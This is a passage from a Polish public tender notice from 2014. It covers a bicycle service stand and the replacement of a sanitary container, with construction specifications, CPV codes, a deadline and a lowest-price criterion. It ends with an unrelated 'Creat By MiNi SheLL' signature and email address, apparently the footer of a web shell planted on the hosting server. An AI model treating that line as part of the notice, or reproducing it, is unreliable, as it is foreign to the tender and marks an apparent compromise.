29 cali z lub bez opony. Stojak rowerowy serwisowy. Wykonany z zastosowaniem elementów aluminiowych ze stalowymi łącznikami. Obrotowy w pełnym zakresie. Wysokość regulowana płynnie. Szczegółowy opis wymagań materiałowych, jakościowych oraz wymiary i ilość poszczególnych elementów wyposażenia wnętrza zawierają SIWZ. dokumentacja projektowa w tym projekt aranżacji wnętrza oraz specyfikacje techniczne wykonania i odbioru robót oraz przedmiary..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana kontenera sanitarnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana kontenera sanitarnego. Demontaż i przewiezienie we wskazane przez Zamawiającego miejsce istniejącego kontenera sanitarnego. Wykonanie żelbetowych stóp fundamentowych o wysokości 80 cm i podstawie 40 x 40 cm. Wykonanie podziemnych przyłączy wod-kan dł. 1,5 m i energetycznego dł. 54 mb kabel YKYżo 5 x10 mm2. Przyłącza zalicznikowe nie wymagające uzgodnień z właścicielami sieci wod-kan i elektrycznej. Dostawa i instalacja na gotowych stopach fundamentowych kompletnego kontenera sanitarnego z dwiema kabinami w tym jedna przystosowana dla potrzeb osób niepełnosprawnych. Budynek na planie prostokąta 2.50 x 4.80 m. Konstrukcja szkielet stalowy samonośny z profili zamkniętych + kątowniki, ceowniki. Ściany zewnętrzne płyta warstwowa o profilu elewacyjnym z rdzeniem styropianowym o gr. 100 mm, na zewnątrz i wewnątrz blacha stalowa o gr. 0,55 mm w powłoce ochronnej. Drzwi pełne stalowe okna z PCV rozwierno uchylne. Podłoga, konstrukcja z kształtowników ze stali S235JR, zimno giętych gr. 4mm, spawanych, zabezpieczonych antykorozyjnie; izolacja styropian gr. 10cm warstwy podłogi blacha ocynkowana T14 gr. 0,5mm, folia paroizolacyjna, płyta OSB 3 gr. 2,2 cm, wykładzina podłogowa z tworzywa sztucznego PCV gr. 2,0mm. Stropodach płyta warstwowa o profilu dachowym T35 z rdzeniem styropianowym o gr. 100 mm na zewnątrz i wewnątrz blacha stalowa o gr. 0,55 mm. Ze względów estetycznych kontener wyposażyć w dwuspadowy dach o kącie nachylenia głównych połaci 35o. Konstrukcja z profili zamkniętych ze stali S235JR 40 x 80 mm, zimno giętych gr. 3 mm. Pokrycie dachu blacha płaska kolor grafitowy na rąbek stojący na deskowaniu pełnym, obróbki blacharskie, rynny i rury spustowe z blachy powlekanej w kolorze dachu. Przed wejściem do budynku wykonać pochylnię z kostki betonowej polbruk dla osób niepełnosprawnych ruchowo, o spadku 6% i spoczniku 1.50 x 1.50 m. Kontener musi być fabrycznie wyposażony we wszelkie niezbędne instalacje tj. wod-kan 2 x WC kompakt z odpływem dolnym, 2 x umywalka z baterią umywalkową, 2 x przepływowy ogrzewacz wody, 1x komplet uchwytów dla niepełnosprawnych i elektryczną oświetleniową wraz z oprawami w każdym pomieszczeniu i jedną zewnętrzną z czujnikiem ruchu, wyłączniki nawierzchniowe hermetyczne, gniazd wtykowych 2 x gniazdo wtykowe nawierzchniowe hermetyczne, wyłącznik różnicowoprądowy, wyłączniki nadprądowe, 2 x grzejnik elektryczny. Szczegółowy opis przedmiotu zamówienia zawierają dołączone do niniejszej SIWZ dokumentacja projektowa, przedmiary i stwiorb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com